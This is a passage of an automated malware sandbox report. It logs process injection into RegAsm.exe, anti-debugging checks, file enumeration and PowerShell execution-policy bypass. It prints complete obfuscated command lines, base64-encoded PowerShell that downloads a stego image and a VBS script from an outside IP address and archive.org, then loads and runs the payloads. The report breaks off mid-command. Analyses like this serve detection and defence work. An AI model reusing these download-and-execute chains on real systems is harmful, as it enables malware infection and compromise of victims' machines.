                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\mshta.exe TID: 1080Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2984Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120Thread sleep count: 136 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120Thread sleep time: -68000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048Thread sleep count: 901 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048Thread sleep time: -2703000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3412Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048Thread sleep count: 8713 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3048Thread sleep time: -26139000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2440Thread sleep count: 1415 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 892Thread sleep count: 3730 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184Thread sleep time: -300000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1424Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2204Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3768Thread sleep count: 1198 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048Thread sleep count: 3618 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -1200000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 536Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10006580 FindFirstFileExA,17_2_10006580
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,30_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,30_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,30_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,30_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00407877 FindFirstFileW,FindNextFileW,30_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0044E8F9 FindFirstFileExA,30_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,30_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,30_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,30_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,30_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00418981 memset,GetSystemInfo,21_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_23-34250
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,30_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10004AB4 mov eax, dword ptr fs:[00000030h]17_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00443355 mov eax, dword ptr fs:[00000030h]30_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_1000724E GetProcessHeap,17_2_1000724E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_10002B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00434BD8 SetUnhandledExceptionFilter,30_2_00434BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0043BB71

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Maps a DLL or memory area into another process
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
                    Writes to foreign memory regions
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe30_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00419662 mouse_event,30_2_00419662
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0Y